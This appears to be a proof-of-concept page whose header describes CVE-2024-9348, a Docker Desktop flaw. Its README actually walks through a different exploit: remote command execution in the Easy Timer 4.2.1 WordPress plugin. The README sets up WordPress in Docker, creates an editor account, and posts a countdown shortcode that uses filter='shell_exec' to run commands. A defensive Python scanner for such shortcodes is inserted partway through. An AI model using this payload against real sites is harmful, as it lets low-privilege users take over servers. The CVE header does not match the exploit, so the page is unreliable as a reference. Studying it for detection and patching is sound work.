CVE-2024-9348 PoC — Docker Desktop Security Vulnerability

Source
Associated Vulnerability
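Title: Docker Desktop Security Vulnerability (CVE-2024-9348)
Description: Docker Desktop is desktop software from the US company Docker, built on container technology, for lightweight application deployment. The product provides a desktop environment that supports creating a container (a lightweight virtual machine) on Linux/Windows/Mac OS systems and deploying and running applications in it, as well as automating application installation, deployment and upgrades through configuration files. Docker Desktop versions before v4.34.3 contain a security vulnerability that allows remote code execution (RCE) via unsanitized GitHub source links in the Build view.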
Readme
# Easy Timer v4.2.1 - 

## Prerequisites

* Docker Engine installed
* Docker Compose installed

Refer to the official Docker docs for installation: [Docker Engine Install](https://docs.docker.com/engine/install/)

## 1. Start WordPress with Docker

From your project directory:

```bash
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress
```

## 2. Set Up WordPress

1. Navigate to `http://localhost:8000/`
2. Complete the WordPress Setup
3. Navigate to `WordPress Dashboard` → `Plugins` → `Easy Timer` and click `Activate`.
<img width="740" height="325" alt="Screenshot from 2025-10-27 12-52-06" src="https://github.com/user-attachments/assets/91f6d1b6-83c4-4781-b3fa-d5be4d218c3e" />

## 3. Add new user with Editor Privileges

From your project directory execute the following command:
```bash
docker compose run --rm wpcli user create \
  editoruser editoruser@example.com \
  --role=editor \
  --user_pass=P@ssw0rd!
```
(note: replace with your choice of user name, email and password!)

## 4. Create Post

1. Go to `Posts` → `Add New`
2. Insert a `Shortcode block` and enter:

```text
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
```

3. Click **Update → Preview Post** to see the timer execute.

> ⚠️ Note: Ensure you are using a **Shortcode block**, not a Paragraph block, for the shortcode to render properly.

<img width="681" height="278" alt="Screenshot from 2025-10-27 13-36-40" src="https://github.com/user-attachments/assets/00672fbd-9f1e-4a99-9508-f20f91488252" />

---
Congratz you got RCE.
<img width="944" height="620" alt="image" src="https://github.com/user-attachments/assets/2adc719c-4556-4a15-a216-9542a458c8b1" />
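
A defender-side check for the pattern shown in step 4, as an added example that is not part of the original README: it scans post content for shortcodes carrying a `filter` attribute and flags those that name a PHP command-execution function. The function names other than `shell_exec`, the comma splitting, and the sample posts are assumptions constructed for illustration.

```python
import re

# PHP functions that run OS commands. "shell_exec" is the one used on this
# page; the other standard PHP functions are added here as an assumption.
EXEC_FUNCS = {"shell_exec", "exec", "system", "passthru", "popen", "proc_open"}

# Opening shortcode tag: [name attrs]; closing tags ([/name]) are skipped.
TAG_RE = re.compile(r"\[(?!/)([A-Za-z][\w-]*)([^\]]*)\]")
# filter=value in the three quoting styles WordPress shortcodes accept.
FILTER_RE = re.compile(
    r"""(?<![\w-])filter\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s\]]+))""", re.I)

# Constructed sample post bodies keyed by post ID (not real data).
SAMPLE_POSTS = {
    101: '[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]',
    102: "[countdown date=2025/12/17-00:00:00]Launch soon[/countdown]",
    103: "<p>[countdown date=2025/12/17-00:00:00 filter='SHELL_EXEC']ls -l[/countdown]</p>",
    104: "[countdown date=2025/12/17-00:00:00 filter=strtoupper]soon[/countdown]",
}


def scan_post(post_id, content):
    """Return one finding per shortcode that carries a filter attribute."""
    findings = []
    for tag in TAG_RE.finditer(content):
        name, attrs = tag.group(1), tag.group(2)
        m = FILTER_RE.search(attrs)
        if not m:
            continue
        value = next(g for g in m.groups() if g is not None)
        # PHP function names are case-insensitive. Assumption: the value may
        # list several names, so split on commas and whitespace.
        funcs = [f.lower() for f in re.split(r"[,\s]+", value.strip()) if f]
        findings.append({
            "post_id": post_id,
            "shortcode": name.lower(),
            "filters": funcs,
            "command_exec": any(f in EXEC_FUNCS for f in funcs),
        })
    return findings


def flagged_posts(posts):
    """Return IDs of posts whose shortcodes name a command-executing filter."""
    return [pid for pid, body in posts.items()
            if any(f["command_exec"] for f in scan_post(pid, body))]


if __name__ == "__main__":
    print(flagged_posts(SAMPLE_POSTS))
```

Findings with `command_exec` set to false still deserve review, since any `filter` value is a function name supplied by the post author.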




## Debugging Tips

* Check running containers:

```bash
sudo docker ps
```

You should see something like:

<img width="1174" height="121" alt="Screenshot from 2025-10-27 12-51-08" src="https://github.com/user-attachments/assets/41599c77-12b2-482e-b349-a79075e45ae7" />


* If shortcodes are **not rendering**:

  1. Go to **Appearance → Themes**
  2. Activate **Twenty Twenty-Three** (or another default theme).


* If navigating to `http://localhost:8000/` says **Database Not Connected**:
  1. Wait a minute or two for the Database to finish setting up
File Snapshot

```text
[4.0K] /data/pocs/37c97f3453099796f39b0d54fff25229068fff9e
├── [1.1K] docker-compose.yml
└── [2.3K] README.md

1 directory, 2 files
```